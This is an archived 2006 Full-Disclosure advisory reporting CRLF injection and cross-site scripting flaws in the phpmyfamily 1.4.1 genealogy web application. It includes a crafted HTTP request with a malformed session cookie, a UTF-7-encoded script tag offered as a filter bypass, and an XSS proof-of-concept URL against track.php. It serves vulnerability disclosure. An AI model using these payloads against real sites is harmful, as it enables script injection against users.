lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <68cbfab10603270046x5ab00245gfc95f5ac3100aedf@mail.gmail.com>
Date: Mon Mar 27 09:46:17 2006
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection &
	XSS

------------------------------------------------------
      HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006


TITLE:
======

phpmyfamily v1.4.1 CRLF injection & XSS


SEVERITY:
=========

Medium


SOFTWARE:
=========

phpmyfamily v1.4.1

http://www.phpmyfamily.net/


INFO:
=====

phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central database of
research which is readily accessable and editable.


DESCRIPTION:
============

--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z,

0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88

You can try to encode <script>alert('matrix_killer');</script> in Utf-7 like
this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-

This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't but I'm still a beginner with

the crlf attacks.

--== XSS ==--

http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij


VENDOR STATUS:
==============

Vendor was contacted but no response received till date.


CREDITS:
========

This vulnerability was discovered and researched by matrix_killer of h4cky0u
Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us
!!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt

--
http://www.h4cky0u.org
(In)Security at its best...
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060327/de8d01a1/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ